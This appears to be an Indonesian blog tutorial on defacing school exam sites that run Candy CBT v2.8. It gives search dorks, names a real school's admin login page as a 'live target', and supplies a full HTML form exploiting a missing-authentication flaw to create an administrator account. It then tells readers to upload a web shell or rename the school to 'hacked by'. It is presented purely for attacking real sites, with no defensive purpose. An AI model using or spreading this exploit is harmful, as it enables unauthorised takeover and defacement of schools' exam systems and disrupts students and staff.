Halo teman teman,
Ya kali ini seperti di judul saya akan membawakan tutorial Deface situs ujian/unbk/ujianonlen yaitu CANDY CBT ADD ADMIN
Seperti biasa, buat belajar saya siapin live target: https://elearning.smpn1panguragan.sch.id/admin/login.php
Bahan²
Dork: © Candy CBT v2.8.0 inurl:login.php 2021
intext:"Support By Candy CBT V2.8"
Shell(buat jaga jaga)
Csrf cbt
Exploit: admin/login.php
Kalian dorking dulu, masukin exploit di belakang alamat web contoh: site.com/admin/login.php
Nah kalo vuln maka akan seperti ini:
Oke langsung ke csrf, csrf nya kalian copy dibawah ini save dengan format .html
<html>
<head></head>
<body>
<form action="site.com/admin/?pg=pengawas" method="post">
<label>nip</label>
<input type="text" name="nip" value="123761717" required="true" />
<br>
<label>nama</label>
<input type="text" name="nama" required="true" />
<br>
<label>username</label>
<input type="text" name="username" required="true" />
<br>
<label>password</label>
<input type="password" name="pass1" required="true" />
<br>
<label>ulang password</label>
<input type="password" name="pass2" required="true" />
<br>
<button type="submit" name="submit">simpan</button>
</form>
</body>
</html>
Bagian site.com ganti dengan web yang kalian dapat tadi
Jika sudah save->buka file paket chrome
Kalian isi username password terserah kalian, asal kalian inget, terus klik submit nah kalo berhasil maka akan kembali ke halaman login admin lagi
Kalian login pake username kalian buat barusan nah maka akan ke dashboard seperti ini
Kalian klik pengaturan->klik restore data->upshel kalian jika ga bisa kalian edit aja nama sekolah, judul sekolah paket heked by kalian
Nah oke udah itu aja semoga bermanfaat
Post a Comment (0)